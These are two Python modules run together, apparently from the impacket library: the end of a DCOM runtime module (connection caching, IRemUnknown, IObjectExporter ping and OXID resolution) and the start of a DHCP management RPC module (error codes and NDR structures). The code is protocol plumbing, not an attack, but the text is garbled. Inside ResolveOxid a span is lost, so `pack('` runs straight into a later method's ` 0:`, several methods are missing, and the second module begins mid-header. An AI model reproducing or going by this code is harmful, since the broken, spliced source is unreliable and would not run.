RPC_C_AUTHN_LEVEL_PKT_PRIVACY\n return self.__authLevel\n def set_auth_level(self, level):\n self.__authLevel = level\n def get_auth_type(self):\n return self.__authType\n def set_auth_type(self, authType):\n self.__authType = authType\n\n\nclass INTERFACE:\n # class variable holding the transport connections, organized by target IP\n CONNECTIONS = {}\n\n def __init__(self, cinstance=None, objRef=None, ipidRemUnknown=None, iPid=None, oxid=None, oid=None, target=None,\n interfaceInstance=None):\n if interfaceInstance is not None:\n self.__target = interfaceInstance.get_target()\n self.__iPid = interfaceInstance.get_iPid()\n self.__oid = interfaceInstance.get_oid()\n self.__oxid = interfaceInstance.get_oxid()\n self.__cinstance = interfaceInstance.get_cinstance()\n self.__objRef = interfaceInstance.get_objRef()\n self.__ipidRemUnknown = interfaceInstance.get_ipidRemUnknown()\n else:\n if target is None:\n raise Exception('No target')\n self.__target = target\n self.__iPid = iPid\n self.__oid = oid\n self.__oxid = oxid\n self.__cinstance = cinstance\n self.__objRef = objRef\n self.__ipidRemUnknown = ipidRemUnknown\n # We gotta check if we have a container inside our connection list, if not, create\n if (self.__target in INTERFACE.CONNECTIONS) is not True:\n INTERFACE.CONNECTIONS[self.__target] = {}\n INTERFACE.CONNECTIONS[self.__target][current_thread().name] = {}\n\n if objRef is not None:\n self.process_interface(objRef)\n\n def process_interface(self, data):\n objRefType = OBJREF(data)['flags']\n objRef = None\n if objRefType == FLAGS_OBJREF_CUSTOM:\n objRef = OBJREF_CUSTOM(data)\n elif objRefType == FLAGS_OBJREF_HANDLER:\n objRef = OBJREF_HANDLER(data)\n elif objRefType == FLAGS_OBJREF_STANDARD:\n objRef = OBJREF_STANDARD(data)\n elif objRefType == FLAGS_OBJREF_EXTENDED:\n objRef = OBJREF_EXTENDED(data)\n else:\n LOG.error(\"Unknown OBJREF Type! 0x%x\" % objRefType)\n\n if objRefType != FLAGS_OBJREF_CUSTOM:\n if objRef['std']['flags'] & SORF_NOPING == 0:\n DCOMConnection.addOid(self.__target, objRef['std']['oid'])\n self.__iPid = objRef['std']['ipid']\n self.__oid = objRef['std']['oid']\n self.__oxid = objRef['std']['oxid']\n if self.__oxid is None:\n objRef.dump()\n raise Exception('OXID is None')\n\n def get_oxid(self):\n return self.__oxid\n\n def set_oxid(self, oxid):\n self.__oxid = oxid\n\n def get_oid(self):\n return self.__oid\n\n def set_oid(self, oid):\n self.__oid = oid\n\n def get_target(self):\n return self.__target\n\n def get_iPid(self):\n return self.__iPid\n\n def set_iPid(self, iPid):\n self.__iPid = iPid\n\n def get_objRef(self):\n return self.__objRef\n\n def set_objRef(self, objRef):\n self.__objRef = objRef\n\n def get_ipidRemUnknown(self):\n return self.__ipidRemUnknown\n\n def get_dce_rpc(self):\n return INTERFACE.CONNECTIONS[self.__target][current_thread().name][self.__oxid]['dce']\n\n def get_cinstance(self):\n return self.__cinstance\n\n def set_cinstance(self, cinstance):\n self.__cinstance = cinstance\n\n def is_fqdn(self):\n # I will assume the following\n # If I can't socket.inet_aton() then it's not an IPv4 address\n # Same for ipv6, but since socket.inet_pton is not available in Windows, I'll look for ':'. There can't be\n # an FQDN with ':'\n # Is it isn't both, then it is a FQDN\n try:\n socket.inet_aton(self.__target)\n except:\n # Not an IPv4\n try:\n self.__target.index(':')\n except:\n # Not an IPv6, it's a FQDN\n return True\n return False\n\n def connect(self, iid = None):\n if (self.__target in INTERFACE.CONNECTIONS) is True:\n if current_thread().name in INTERFACE.CONNECTIONS[self.__target] and \\\n (self.__oxid in INTERFACE.CONNECTIONS[self.__target][current_thread().name]) is True:\n dce = INTERFACE.CONNECTIONS[self.__target][current_thread().name][self.__oxid]['dce']\n currentBinding = INTERFACE.CONNECTIONS[self.__target][current_thread().name][self.__oxid]['currentBinding']\n if currentBinding == iid:\n # We don't need to alter_ctx\n pass\n else:\n newDce = dce.alter_ctx(iid)\n INTERFACE.CONNECTIONS[self.__target][current_thread().name][self.__oxid]['dce'] = newDce\n INTERFACE.CONNECTIONS[self.__target][current_thread().name][self.__oxid]['currentBinding'] = iid\n else:\n stringBindings = self.get_cinstance().get_string_bindings()\n # No OXID present, we should create a new connection and store it\n stringBinding = None\n isTargetFQDN = self.is_fqdn()\n LOG.debug('Target system is %s and isFQDN is %s' % (self.get_target(), isTargetFQDN))\n for strBinding in stringBindings:\n # Here, depending on the get_target() value several things can happen\n # 1) it's an IPv4 address\n # 2) it's an IPv6 address\n # 3) it's a NetBios Name\n # we should handle all this cases accordingly\n # Does this match exactly what get_target() returns?\n LOG.debug('StringBinding: %s' % strBinding['aNetworkAddr'])\n if strBinding['wTowerId'] == 7:\n # If there's port information, let's strip it for now.\n if strBinding['aNetworkAddr'].find('[') >= 0:\n binding, _, bindingPort = strBinding['aNetworkAddr'].partition('[')\n bindingPort = '[' + bindingPort\n else:\n binding = strBinding['aNetworkAddr']\n bindingPort = ''\n\n if binding.upper().find(self.get_target().upper()) >= 0:\n stringBinding = 'ncacn_ip_tcp:' + strBinding['aNetworkAddr'][:-1]\n break\n # If get_target() is a FQDN, does it match the hostname?\n elif isTargetFQDN and binding.upper().find(self.get_target().upper().partition('.')[0]) >= 0:\n # Here we replace the aNetworkAddr with self.get_target()\n # This is to help resolving the target system name.\n # self.get_target() has been resolved already otherwise we wouldn't be here whereas\n # aNetworkAddr is usually the NetBIOS name and unless you have your DNS resolver\n # with the right suffixes it will probably not resolve right.\n stringBinding = 'ncacn_ip_tcp:%s%s' % (self.get_target(), bindingPort)\n break\n\n LOG.debug('StringBinding chosen: %s' % stringBinding)\n if stringBinding is None:\n # Something wen't wrong, let's just report it\n raise Exception('Can\\'t find a valid stringBinding to connect')\n\n dcomInterface = transport.DCERPCTransportFactory(stringBinding)\n\n if DCOMConnection.PORTMAPS[self.__target].get_rpc_transport().get_kerberos():\n dcomInterface.setRemoteHost(DCOMConnection.PORTMAPS[self.__target].get_rpc_transport().getRemoteHost())\n dcomInterface.setRemoteName(DCOMConnection.PORTMAPS[self.__target].get_rpc_transport().getRemoteName())\n\n if hasattr(dcomInterface, 'set_credentials'):\n # This method exists only for selected protocol sequences.\n dcomInterface.set_credentials(*DCOMConnection.PORTMAPS[self.__target].get_credentials())\n dcomInterface.set_kerberos(DCOMConnection.PORTMAPS[self.__target].get_rpc_transport().get_kerberos(),\n DCOMConnection.PORTMAPS[self.__target].get_rpc_transport().get_kdcHost())\n dcomInterface.set_connect_timeout(300)\n dce = dcomInterface.get_dce_rpc()\n\n if iid is None:\n raise Exception('IID is None')\n else:\n dce.set_auth_level(self.__cinstance.get_auth_level())\n dce.set_auth_type(self.__cinstance.get_auth_type())\n\n dce.connect()\n\n if iid is None:\n raise Exception('IID is None')\n else:\n dce.bind(iid)\n\n if self.__oxid is None:\n #import traceback\n #traceback.print_stack()\n raise Exception(\"OXID NONE, something wrong!!!\")\n\n INTERFACE.CONNECTIONS[self.__target][current_thread().name] = {}\n INTERFACE.CONNECTIONS[self.__target][current_thread().name][self.__oxid] = {}\n INTERFACE.CONNECTIONS[self.__target][current_thread().name][self.__oxid]['dce'] = dce\n INTERFACE.CONNECTIONS[self.__target][current_thread().name][self.__oxid]['currentBinding'] = iid\n else:\n # No connection created\n raise Exception('No connection created')\n\n def request(self, req, iid = None, uuid = None):\n req['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n req['ORPCthis']['flags'] = 0\n self.connect(iid)\n dce = self.get_dce_rpc()\n try:\n resp = dce.request(req, uuid)\n except Exception as e:\n if str(e).find('RPC_E_DISCONNECTED') >= 0:\n msg = str(e) + '\\n'\n msg += \"DCOM keep-alive pinging it might not be working as expected. You can't be idle for more than 14 minutes!\\n\"\n msg += \"You should exit the app and start again\\n\"\n raise DCERPCException(msg)\n else:\n raise\n return resp\n\n def disconnect(self):\n return INTERFACE.CONNECTIONS[self.__target][current_thread().name][self.__oxid]['dce'].disconnect()\n\n\n# 3.1.1.5.6.1 IRemUnknown Methods\nclass IRemUnknown(INTERFACE):\n def __init__(self, interface):\n self._iid = IID_IRemUnknown\n #INTERFACE.__init__(self, interface.get_cinstance(), interface.get_objRef(), interface.get_ipidRemUnknown(),\n # interface.get_iPid(), target=interface.get_target())\n INTERFACE.__init__(self, interfaceInstance=interface)\n self.set_oxid(interface.get_oxid())\n\n def RemQueryInterface(self, cRefs, iids):\n # For now, it only supports a single IID\n request = RemQueryInterface()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n request['ripid'] = self.get_iPid()\n request['cRefs'] = cRefs\n request['cIids'] = len(iids)\n for iid in iids:\n _iid = IID()\n _iid['Data'] = iid\n request['iids'].append(_iid)\n resp = self.request(request, IID_IRemUnknown, self.get_ipidRemUnknown())\n #resp.dump()\n\n return IRemUnknown2(\n INTERFACE(self.get_cinstance(), None, self.get_ipidRemUnknown(), resp['ppQIResults']['std']['ipid'],\n oxid=resp['ppQIResults']['std']['oxid'], oid=resp['ppQIResults']['std']['oxid'],\n target=self.get_target()))\n\n def RemAddRef(self):\n request = RemAddRef()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n request['cInterfaceRefs'] = 1\n element = REMINTERFACEREF()\n element['ipid'] = self.get_iPid()\n element['cPublicRefs'] = 1\n request['InterfaceRefs'].append(element)\n resp = self.request(request, IID_IRemUnknown, self.get_ipidRemUnknown())\n return resp\n\n def RemRelease(self):\n request = RemRelease()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n request['cInterfaceRefs'] = 1\n element = REMINTERFACEREF()\n element['ipid'] = self.get_iPid()\n element['cPublicRefs'] = 1\n request['InterfaceRefs'].append(element)\n resp = self.request(request, IID_IRemUnknown, self.get_ipidRemUnknown())\n DCOMConnection.delOid(self.get_target(), self.get_oid())\n return resp\n\n# 3.1.1.5.7 IRemUnknown2 Interface\nclass IRemUnknown2(IRemUnknown):\n def __init__(self, interface):\n IRemUnknown.__init__(self, interface)\n self._iid = IID_IRemUnknown2\n\n# 3.1.2.5.1 IObjectExporter Methods\nclass IObjectExporter:\n def __init__(self, dce):\n self.__portmap = dce\n\n # 3.1.2.5.1.1 IObjectExporter::ResolveOxid (Opnum 0)\n def ResolveOxid(self, pOxid, arRequestedProtseqs):\n self.__portmap.connect()\n self.__portmap.bind(IID_IObjectExporter)\n request = ResolveOxid()\n request['pOxid'] = pOxid\n request['cRequestedProtseqs'] = len(arRequestedProtseqs)\n for protSeq in arRequestedProtseqs:\n request['arRequestedProtseqs'].append(protSeq)\n resp = self.__portmap.request(request)\n Oxids = b''.join(pack(' 0:\n for oid in addToSet:\n oidn = OID()\n oidn['Data'] = oid\n request['AddToSet'].append(oidn)\n else:\n request['AddToSet'] = NULL\n\n if len(delFromSet) > 0:\n for oid in delFromSet:\n oidn = OID()\n oidn['Data'] = oid\n request['DelFromSet'].append(oidn)\n else:\n request['DelFromSet'] = NULL\n resp = self.__portmap.request(request)\n return resp\n\n # 3.1.2.5.1.4 IObjectExporter::ServerAlive (Opnum 3)\n def ServerAlive(self):\n self.__portmap.connect()\n self.__portmap.bind(IID_IObjectExporter)\n request = ServerAlive()\n resp = self.__portmap.request(request)\n return resp\n\n # 3.1.2.5.1.5 IObjectExporter::ResolveOxid2 (Opnum 4)\n def ResolveOxid2(self,pOxid, arRequestedProtseqs):\n self.__portmap.connect()\n self.__portmap.bind(IID_IObjectExporter)\n request = ResolveOxid2()\n request['pOxid'] = pOxid\n request['cRequestedProtseqs'] = len(arRequestedProtseqs)\n for protSeq in arRequestedProtseqs:\n request['arRequestedProtseqs'].append(protSeq)\n resp = self.__portmap.request(request)\n Oxids = b''.join(pack('.\n# There are test cases for them too.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom impacket import system_errors\nfrom impacket.dcerpc.v5.dtypes import LPWSTR, ULONG, NULL, DWORD, BOOL, BYTE, LPDWORD, WORD\nfrom impacket.dcerpc.v5.ndr import NDRCALL, NDRUniConformantArray, NDRPOINTER, NDRSTRUCT, NDRENUM, NDRUNION\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerpc.v5.enum import Enum\nfrom impacket.uuid import uuidtup_to_bin\n\nMSRPC_UUID_DHCPSRV = uuidtup_to_bin(('6BFFD098-A112-3610-9833-46C3F874532D', '1.0'))\nMSRPC_UUID_DHCPSRV2 = uuidtup_to_bin(('5B821720-F63B-11D0-AAD2-00C04FC324DB', '1.0'))\n\n\n################################################################################\n# CONSTANTS\n################################################################################\nDHCP_SRV_HANDLE = LPWSTR\nDHCP_IP_ADDRESS = DWORD\nDHCP_IP_MASK = DWORD\nDHCP_OPTION_ID = DWORD\n\n# DHCP enumeratiom flags\nDHCP_FLAGS_OPTION_DEFAULT = 0x00000000\nDHCP_FLAGS_OPTION_IS_VENDOR = 0x00000003\n\n# Errors\nERROR_DHCP_REGISTRY_INIT_FAILED = 0x00004E20\nERROR_DHCP_DATABASE_INIT_FAILED = 0x00004E21\nERROR_DHCP_RPC_INIT_FAILED = 0x00004E22\nERROR_DHCP_NETWORK_INIT_FAILED = 0x00004E23\nERROR_DHCP_SUBNET_EXITS = 0x00004E24\nERROR_DHCP_SUBNET_NOT_PRESENT = 0x00004E25\nERROR_DHCP_PRIMARY_NOT_FOUND = 0x00004E26\nERROR_DHCP_ELEMENT_CANT_REMOVE = 0x00004E27\nERROR_DHCP_OPTION_EXITS = 0x00004E29\nERROR_DHCP_OPTION_NOT_PRESENT = 0x00004E2A\nERROR_DHCP_ADDRESS_NOT_AVAILABLE = 0x00004E2B\nERROR_DHCP_RANGE_FULL = 0x00004E2C\nERROR_DHCP_JET_ERROR = 0x00004E2D\nERROR_DHCP_CLIENT_EXISTS = 0x00004E2E\nERROR_DHCP_INVALID_DHCP_MESSAGE = 0x00004E2F\nERROR_DHCP_INVALID_DHCP_CLIENT = 0x00004E30\nERROR_DHCP_SERVICE_PAUSED = 0x00004E31\nERROR_DHCP_NOT_RESERVED_CLIENT = 0x00004E32\nERROR_DHCP_RESERVED_CLIENT = 0x00004E33\nERROR_DHCP_RANGE_TOO_SMALL = 0x00004E34\nERROR_DHCP_IPRANGE_EXITS = 0x00004E35\nERROR_DHCP_RESERVEDIP_EXITS = 0x00004E36\nERROR_DHCP_INVALID_RANGE = 0x00004E37\nERROR_DHCP_RANGE_EXTENDED = 0x00004E38\nERROR_EXTEND_TOO_SMALL = 0x00004E39\nWARNING_EXTENDED_LESS = 0x00004E3A\nERROR_DHCP_JET_CONV_REQUIRED = 0x00004E3B\nERROR_SERVER_INVALID_BOOT_FILE_TABLE = 0x00004E3C\nERROR_SERVER_UNKNOWN_BOOT_FILE_NAME = 0x00004E3D\nERROR_DHCP_SUPER_SCOPE_NAME_TOO_LONG = 0x00004E3E\nERROR_DHCP_IP_ADDRESS_IN_USE = 0x00004E40\nERROR_DHCP_LOG_FILE_PATH_TOO_LONG = 0x00004E41\nERROR_DHCP_UNSUPPORTED_CLIENT = 0x00004E42\nERROR_DHCP_JET97_CONV_REQUIRED = 0x00004E44\nERROR_DHCP_ROGUE_INIT_FAILED = 0x00004E45\nERROR_DHCP_ROGUE_SAMSHUTDOWN = 0x00004E46\nERROR_DHCP_ROGUE_NOT_AUTHORIZED = 0x00004E47\nERROR_DHCP_ROGUE_DS_UNREACHABLE = 0x00004E48\nERROR_DHCP_ROGUE_DS_CONFLICT = 0x00004E49\nERROR_DHCP_ROGUE_NOT_OUR_ENTERPRISE = 0x00004E4A\nERROR_DHCP_ROGUE_STANDALONE_IN_DS = 0x00004E4B\nERROR_DHCP_CLASS_NOT_FOUND = 0x00004E4C\nERROR_DHCP_CLASS_ALREADY_EXISTS = 0x00004E4D\nERROR_DHCP_SCOPE_NAME_TOO_LONG = 0x00004E4E\nERROR_DHCP_DEFAULT_SCOPE_EXITS = 0x00004E4F\nERROR_DHCP_CANT_CHANGE_ATTRIBUTE = 0x00004E50\nERROR_DHCP_IPRANGE_CONV_ILLEGAL = 0x00004E51\nERROR_DHCP_NETWORK_CHANGED = 0x00004E52\nERROR_DHCP_CANNOT_MODIFY_BINDINGS = 0x00004E53\nERROR_DHCP_SUBNET_EXISTS = 0x00004E54\nERROR_DHCP_MSCOPE_EXISTS = 0x00004E55\nERROR_MSCOPE_RANGE_TOO_SMALL = 0x00004E56\nERROR_DHCP_EXEMPTION_EXISTS = 0x00004E57\nERROR_DHCP_EXEMPTION_NOT_PRESENT = 0x00004E58\nERROR_DHCP_INVALID_PARAMETER_OPTION32 = 0x00004E59\nERROR_DDS_NO_DS_AVAILABLE = 0x00004E66\nERROR_DDS_NO_DHCP_ROOT = 0x00004E67\nERROR_DDS_UNEXPECTED_ERROR = 0x00004E68\nERROR_DDS_TOO_MANY_ERRORS = 0x00004E69\nERROR_DDS_DHCP_SERVER_NOT_FOUND = 0x00004E6A\nERROR_DDS_OPTION_ALREADY_EXISTS = 0x00004E6B\nERROR_DDS_OPTION_DOES_NOT_EXIST = 0x00004E6C\nERROR_DDS_CLASS_EXISTS = 0x00004E6D\nERROR_DDS_CLASS_DOES_NOT_EXIST = 0x00004E6E\nERROR_DDS_SERVER_ALREADY_EXISTS = 0x00004E6F\nERROR_DDS_SERVER_DOES_NOT_EXIST = 0x00004E70\nERROR_DDS_SERVER_ADDRESS_MISMATCH = 0x00004E71\nERROR_DDS_SUBNET_EXISTS = 0x00004E72\nERROR_DDS_SUBNET_HAS_DIFF_SSCOPE = 0x00004E73\nERROR_DDS_SUBNET_NOT_PRESENT = 0x00004E74\nERROR_DDS_RESERVATION_NOT_PRESENT = 0x00004E75\nERROR_DDS_RESERVATION_CONFLICT = 0x00004E76\nERROR_DDS_POSSIBLE_RANGE_CONFLICT = 0x00004E77\nERROR_DDS_RANGE_DOES_NOT_EXIST = 0x00004E78\nERROR_DHCP_DELETE_BUILTIN_CLASS = 0x00004E79\nERROR_DHCP_INVALID_SUBNET_PREFIX = 0x00004E7B\nERROR_DHCP_INVALID_DELAY = 0x00004E7C\nERROR_DHCP_LINKLAYER_ADDRESS_EXISTS = 0x00004E7D\nERROR_DHCP_LINKLAYER_ADDRESS_RESERVATION_EXISTS = 0x00004E7E\nERROR_DHCP_LINKLAYER_ADDRESS_DOES_NOT_EXIST = 0x00004E7F\nERROR_DHCP_HARDWARE_ADDRESS_TYPE_ALREADY_EXEMPT = 0x00004E85\nERROR_DHCP_UNDEFINED_HARDWARE_ADDRESS_TYPE = 0x00004E86\nERROR_DHCP_OPTION_TYPE_MISMATCH = 0x00004E87\nERROR_DHCP_POLICY_BAD_PARENT_EXPR = 0x00004E88\nERROR_DHCP_POLICY_EXISTS = 0x00004E89\nERROR_DHCP_POLICY_RANGE_EXISTS = 0x00004E8A\nERROR_DHCP_POLICY_RANGE_BAD = 0x00004E8B\nERROR_DHCP_RANGE_INVALID_IN_SERVER_POLICY = 0x00004E8C\nERROR_DHCP_INVALID_POLICY_EXPRESSION = 0x00004E8D\nERROR_DHCP_INVALID_PROCESSING_ORDER = 0x00004E8E\nERROR_DHCP_POLICY_NOT_FOUND = 0x00004E8F\nERROR_SCOPE_RANGE_POLICY_RANGE_CONFLICT = 0x00004E90\n\n# DHCP failover error codes\nERROR_DHCP_FO_SCOPE_ALREADY_IN_RELATIONSHIP = 0x00004E91\nERROR_DHCP_FO_RELATIONSHIP_EXISTS = 0x00004E92\n\nERROR_DHCP_FO_RELATIONSHIP_DOES_NOT_EXIST = 0x00004E93\nERROR_DHCP_FO_SCOPE_NOT_IN_RELATIONSHIP = 0x00004E94\nERROR_DHCP_FO_RELATION_IS_SECONDARY = 0x00004E95\nERROR_DHCP_FO_NOT_SUPPORTED = 0x00004E96\nERROR_DHCP_FO_TIME_OUT_OF_SYNC = 0x00004E97\nERROR_DHCP_FO_STATE_NOT_NORMAL = 0x00004E98\nERROR_DHCP_NO_ADMIN_PERMISSION = 0x00004E99\n\nERROR_DHCP_SERVER_NOT_REACHABLE = 0x00004E9A\nERROR_DHCP_SERVER_NOT_RUNNING = 0x00004E9B\nERROR_DHCP_SERVER_NAME_NOT_RESOLVED = 0x00004E9C\nERROR_DHCP_FO_RELATIONSHIP_NAME_TOO_LONG = 0x00004E9D\nERROR_DHCP_REACHED_END_OF_SELECTION = 0x00004E9E\nERROR_DHCP_FO_ADDSCOPE_LEASES_NOT_SYNCED = 0x00004E9F\nERROR_DHCP_FO_MAX_RELATIONSHIPS = 0x00004EA0\nERROR_DHCP_FO_IPRANGE_TYPE_CONV_ILLEGAL = 0x00004EA1\nERROR_DHCP_FO_MAX_ADD_SCOPES = 0x00004EA2\nERROR_DHCP_FO_BOOT_NOT_SUPPORTED = 0x00004EA3\nERROR_DHCP_FO_RANGE_PART_OF_REL = 0x00004EA4\nERROR_DHCP_FO_SCOPE_SYNC_IN_PROGRESS = 0x00004EA5\nERROR_DHCP_FO_FEATURE_NOT_SUPPORTED = 0x00004EA6\nERROR_DHCP_POLICY_FQDN_RANGE_UNSUPPORTED = 0x00004EA7\nERROR_DHCP_POLICY_FQDN_OPTION_UNSUPPORTED = 0x00004EA8\nERROR_DHCP_POLICY_EDIT_FQDN_UNSUPPORTED = 0x00004EA9\nERROR_DHCP_NAP_NOT_SUPPORTED = 0x00004EAA\nERROR_LAST_DHCP_SERVER_ERROR = 0x00004EAB\n\n\nclass DCERPCSessionError(DCERPCException):\n ERROR_MESSAGES = {\n ERROR_DHCP_JET_ERROR: (\"ERROR_DHCP_JET_ERROR\",\n \"An error occurred while accessing the DHCP server database.\"),\n ERROR_DHCP_SUBNET_NOT_PRESENT: (\"ERROR_DHCP_SUBNET_NOT_PRESENT\",\n \"The specified IPv4 subnet does not exist.\"),\n ERROR_DHCP_SUBNET_EXISTS: (\"ERROR_DHCP_SUBNET_EXISTS\",\n \"The IPv4 scope parameters are incorrect. Either the IPv4 scope already\"\n \" exists, corresponding to the SubnetAddress and SubnetMask members of \"\n \"the structure DHCP_SUBNET_INFO (section 2.2.1.2.8), or there is a \"\n \"range overlap of IPv4 addresses between those associated with the \"\n \"SubnetAddress and SubnetMask fields of the new IPv4 scope and the \"\n \"subnet address and mask of an already existing IPv4 scope\"),\n ERROR_DHCP_INVALID_DHCP_CLIENT: (\"ERROR_DHCP_INVALID_DHCP_CLIENT\",\n \"The DHCP server received an invalid message from the client.\"),\n }\n\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__(self):\n key = self.error_code\n if key in system_errors.ERROR_MESSAGES:\n error_msg_short = system_errors.ERROR_MESSAGES[key][0]\n error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]\n return 'DHCPM SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n elif key in self.ERROR_MESSAGES:\n error_msg_short = self.ERROR_MESSAGES[key][0]\n error_msg_verbose = self.ERROR_MESSAGES[key][1]\n return 'DHCPM SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n return 'DHCPM SessionError: unknown error code: 0x%x' % self.error_code\n\n\n################################################################################\n# STRUCTURES\n################################################################################\n# 2.2.1.1.3 DHCP_SEARCH_INFO_TYPE\nclass DHCP_SEARCH_INFO_TYPE(NDRENUM):\n class enumItems(Enum):\n DhcpClientIpAddress = 0\n DhcpClientHardwareAddress = 1\n DhcpClientName = 2\n\n# 2.2.1.1.11 QuarantineStatus\nclass QuarantineStatus(NDRENUM):\n class enumItems(Enum):\n NOQUARANTINE = 0\n RESTRICTEDACCESS = 1\n DROPPACKET = 2\n PROBATION = 3\n EXEMPT = 4\n DEFAULTQUARSETTING = 5\n NOQUARINFO = 6\n\n# 2.2.1.2.7 DHCP_HOST_INFO\nclass DHCP_HOST_INFO(NDRSTRUCT):\n structure = (\n ('IpAddress', DHCP_IP_ADDRESS),\n ('NetBiosName', LPWSTR),\n ('HostName', LPWSTR),\n )\n\n# 2.2.1.2.9 DHCP_BINARY_DATA\nclass BYTE_ARRAY(NDRUniConformantArray):\n item = 'c'\n\nclass PBYTE_ARRAY(NDRPOINTER):\n referent = (\n ('Data', BYTE_ARRAY),\n )\n\nclass DHCP_BINARY_DATA(NDRSTRUCT):\n structure = (\n ('DataLength', DWORD),\n ('Data_', PBYTE_ARRAY),\n )\n\nDHCP_CLIENT_UID = DHCP_BINARY_DATA\n\n# 2.2.1.2.11 DATE_TIME\nclass DATE_TIME(NDRSTRUCT):\n structure = (\n ('dwLowDateTime', DWORD),\n ('dwHighDateTime', DWORD),\n )\n\n# 2.2.1.2.19 DHCP_CLIENT_INFO_VQ\nclass DHCP_CLIENT_INFO_VQ(NDRSTRUCT):\n structure = (\n ('ClientIpAddress', DHCP_IP_ADDRESS),\n ('SubnetMask', DHCP_IP_MASK),\n ('ClientHardwareAddress', DHCP_CLIENT_UID),\n ('ClientName', LPWSTR),\n ('ClientComment', LPWSTR),\n ('ClientLeaseExpires', DATE_TIME),\n ('OwnerHost', DHCP_HOST_INFO),\n ('bClientType', BYTE),\n ('AddressState', BYTE),\n ('Status', QuarantineStatus),\n ('ProbationEnds', DATE_TIME),\n ('QuarantineCapable', BOOL),\n )\n\nclass DHCP_CLIENT_SEARCH_UNION(NDRUNION):\n union = {\n DHCP_SEARCH_INFO_TYPE.DhcpClientIpAddress: ('ClientIpAddress', DHCP_IP_ADDRESS),\n DHCP_SEARCH_INFO_TYPE.DhcpClientHardwareAddress: ('ClientHardwareAddress', DHCP_CLIENT_UID),\n DHCP_SEARCH_INFO_TYPE.DhcpClientName: ('ClientName', LPWSTR),\n }\n\nclass DHCP_SEARCH_INFO(NDRSTRUCT):\n structure = (\n ('SearchType', DHCP_SEARCH_INFO_TYPE),\n ('SearchInfo', DHCP_CLIENT_SEARCH_UNION),\n )\n\n# 2.2.1.2.14 DHCP_CLIENT_INFO_V4\nclass DHCP_CLIENT_INFO_V4(NDRSTRUCT):\n structure = (\n ('ClientIpAddress', DHCP_IP_ADDRESS),\n ('SubnetMask', DHCP_IP_MASK),\n ('ClientHardwareAddress', DHCP_CLIENT_UID),\n ('ClientName', LPWSTR),\n ('ClientComment', LPWSTR),\n ('ClientLeaseExpires', DATE_TIME),\n ('OwnerHost', DHCP_HOST_INFO),\n ('bClientType', BYTE),\n )\n\nclass DHCP_CLIENT_INFO_V5(NDRSTRUCT):\n structure = (\n ('ClientIpAddress', DHCP_IP_ADDRESS),\n ('SubnetMask', DHCP_IP_MASK),\n ('ClientHardwareAddress', DHCP_CLIENT_UID),\n ('ClientName', LPWSTR),\n ('ClientComment', LPWSTR),\n ('ClientLeaseExpires', DATE_TIME),\n ('OwnerHost', DHCP_HOST_INFO),\n ('bClientType', BYTE),\n ('AddressState', BYTE),\n )\n\nclass LPDHCP_CLIENT_INFO_V4(NDRPOINTER):\n referent = (\n ('Data', DHCP_CLIENT_INFO_V4),\n )\n\nclass LPDHCP_CLIENT_INFO_V5(NDRPOINTER):\n referent = (\n ('Data', DHCP_CLIENT_INFO_V5),\n )\n\n# 2.2.1.2.115 DHCP_CLIENT_INFO_PB\nclass DHCP_CLIENT_INFO_PB(NDRSTRUCT):\n structure = (\n ('ClientIpAddress', DHCP_IP_ADDRESS),\n ('SubnetMask', DHCP_IP_MASK),\n ('ClientHardwareAddress', DHCP_CLIENT_UID),\n ('ClientName', LPWSTR),\n ('ClientComment', LPWSTR),\n ('ClientLeaseExpires', DATE_TIME),\n ('OwnerHost', DHCP_HOST_INFO),\n ('bClientType', BYTE),\n ('AddressState', BYTE),\n ('Status', QuarantineStatus),\n ('ProbationEnds', DATE_TIME),\n ('QuarantineCapable', BOOL),\n ('FilterStatus', DWORD),\n ('PolicyName', LPWSTR),\n )\n\nclass LPDHCP_CLIENT_INFO_PB(NDRPOINTER):\n referent = (\n ('Data', DHCP_CLIENT_INFO_PB),\n )\n\nclass LPDHCP_CLIENT_INFO_VQ(NDRPOINTER):\n referent = (\n ('Data', DHCP_CLIENT_INFO_VQ),\n )\n\nclass DHCP_CLIENT_INFO_VQ_ARRAY(NDRUniConformantArray):\n item = LPDHCP_CLIENT_INFO_VQ\n\nclass LPDHCP_CLIENT_INFO_VQ_ARRAY(NDRPOINTER):\n referent = (\n ('Data', DHCP_CLIENT_INFO_VQ_ARRAY),\n )\n\nclass DHCP_CLIENT_INFO_ARRAY_VQ(NDRSTRUCT):\n structure = (\n ('NumElements', DWORD),\n ('Clients', LPDHCP_CLIENT_INFO_VQ_ARRAY),\n )\n\nclass LPDHCP_CLIENT_INFO_ARRAY_VQ(NDRPOINTER):\n referent = (\n ('Data', DHCP_CLIENT_INFO_ARRAY_VQ),\n )\n\nclass DHCP_CLIENT_INFO_V4_ARRAY(NDRUniConformantArray):\n item = LPDHCP_CLIENT_INFO_V4\n\nclass DHCP_CLIENT_INFO_V5_ARRAY(NDRUniConformantArray):\n item = LPDHCP_CLIENT_INFO_V5\n\nclass LPDHCP_CLIENT_INFO_V4_ARRAY(NDRPOINTER):\n referent = (\n ('Data', DHCP_CLIENT_INFO_V4_ARRAY),\n )\n\nclass LPDHCP_CLIENT_INFO_V5_ARRAY(NDRPOINTER):\n referent = (\n ('Data', DHCP_CLIENT_INFO_V5_ARRAY),\n )\n\nclass DHCP_CLIENT_INFO_ARRAY_V4(NDRSTRUCT):\n structure = (\n ('NumElements', DWORD),\n ('Clients', LPDHCP_CLIENT_INFO_V4_ARRAY),\n )\n\nclass DHCP_CLIENT_INFO_ARRAY_V5(NDRSTRUCT):\n structure = (\n ('NumElements', DWORD),\n ('Clients', LPDHCP_CLIENT_INFO_V5_ARRAY),\n )\n\nclass LPDHCP_CLIENT_INFO_ARRAY_V5(NDRPOINTER):\n referent = (\n ('Data', 